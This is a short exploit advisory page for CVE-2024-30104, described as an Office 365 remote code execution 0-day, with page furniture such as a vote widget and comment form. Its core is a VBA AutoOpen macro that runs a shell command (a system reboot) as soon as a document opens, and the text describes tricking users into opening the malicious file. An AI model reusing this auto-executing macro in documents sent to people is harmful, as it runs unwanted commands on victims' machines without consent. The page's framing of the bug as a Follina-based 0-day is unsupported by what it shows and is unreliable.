Microsoft Office 365 Remote Code Execution

2024.07.09

Credit: nu11secur1ty

Risk: High

Local: No

Remote: Yes

CVE: CVE-2024-30104

CWE: N/A

### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)
The problem is still in the "docx" files this vulnerability is a 0 day
based on the Follina exploit. The Microsoft company still doesn't want
to understand, that they MUST remove macros options from the 365
Office and their offline app. In this video, you will see an example
of this, how some users can be trickery to open the malicious file
that is sent to them by the attacker. After execution of the file, the
thing will be very bad for the users who execute it on their computer.
It depends of the scenario.
### The exploit:
```vbs
Sub AutoOpen()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "shutdown /R"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
- Enjoy watching
### PoC:
[video](https://www.patreon.com/posts/cve-2024-30104-107163015)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Office 365 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.